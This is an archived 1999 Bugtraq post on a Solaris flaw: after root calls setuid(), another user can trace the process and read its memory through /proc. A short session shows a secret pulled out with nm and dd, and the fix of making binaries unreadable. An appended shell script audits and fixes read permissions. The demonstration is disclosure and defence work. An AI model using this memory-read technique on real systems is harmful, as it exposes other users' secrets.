Bugtraq mailing list archives
Tracing by uid u after root does setuid(u)
From: djb () CR YP TO (D. J. Bernstein)
Date: Wed, 13 Jan 1999 02:39:16 -0000
Neale Banks writes:
You are proposing that some significant security is obtained by making an executable file unreadable?
Here's a sample session under Solaris:

   # head -1 > login.c
   static char secret[10]; main() { read(0,secret,10); setuid(1); sleep(60); }
   # gcc -o login login.c
   # echo OSSIFRAGE | ./login &
   25145
   # nm login | grep secret
   [35] | 133268| 10|OBJT |LOCL |0 |17 |secret
   # su daemon -c '(lseek 133268; dd bs=10 count=1) < /proc/25145'
   OSSIFRAGE
   1+0 records in
   1+0 records out

That's right: tracing is allowed even though there hasn't been an exec. Many programs that use setuid() can be exploited this way. For example, you lose all security if you use the chdir()/setuid() mechanism suggested by Steve Bellovin and Gene Spafford.

Fortunately, as I said, there's a trivial workaround. All you have to do is make the binaries unreadable:

   # chmod 711 login
   # su daemon -c ': < /proc/25145'
   su: /proc/25145: cannot open

Perhaps the Sun kernel developers aren't aware that it's bad to allow tracing after a program changes uid, but obviously they are aware that it's bad to allow tracing of an unreadable program. In fact, the /proc documentation identifies this as a security measure.

I'm not saying that unreadability provides some sort of magic immunity against any conceivable OS bug; but I haven't found any systems where it's inadequate.

---Dan
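
An added example, not part of the original message and not the author's code: a shell audit for the workaround described above, reporting which of the given binaries are still readable by group or other and clearing those read bits. The function names are hypothetical, and it uses chmod go-r instead of the post's chmod 711 so that any other mode bits on the file are left untouched.

```sh
#!/bin/sh
# Added example: audit binaries of programs that call setuid() after
# reading secrets, checking the "make the binary unreadable" workaround.

# readable_by_others FILE
# Succeeds if FILE is a regular file with group-read or other-read set.
# find tests the mode bits themselves, so the answer is the same when the
# audit is run as root. -L makes a symlinked path resolve to its target.
readable_by_others() {
    [ -n "$(find -L "$1" -prune -type f \
        \( -perm -040 -o -perm -004 \) -print 2>/dev/null)" ]
}

# audit_unreadable FILE...
# Prints "READABLE <path>" for every file that group/other can read and
# "MISSING <path>" for anything that is not a regular file.
# Returns 0 only if every listed file exists and is unreadable to others.
audit_unreadable() {
    bad=0
    for f in "$@"; do
        if [ ! -f "$f" ]; then
            echo "MISSING $f"
            bad=$((bad + 1))
        elif readable_by_others "$f"; then
            echo "READABLE $f"
            bad=$((bad + 1))
        fi
    done
    [ "$bad" -eq 0 ]
}

# harden_unreadable FILE...
# Removes group/other read permission from the files the audit flags.
# Execute bits stay, so the program can still be run (755 becomes 711).
harden_unreadable() {
    for f in "$@"; do
        if readable_by_others "$f"; then
            chmod go-r "$f" && echo "FIXED $f"
        fi
    done
}

# Stand-alone use: sh audit.sh /path/to/login /path/to/other-daemon
if [ "$#" -gt 0 ]; then
    audit_unreadable "$@"
fi
```
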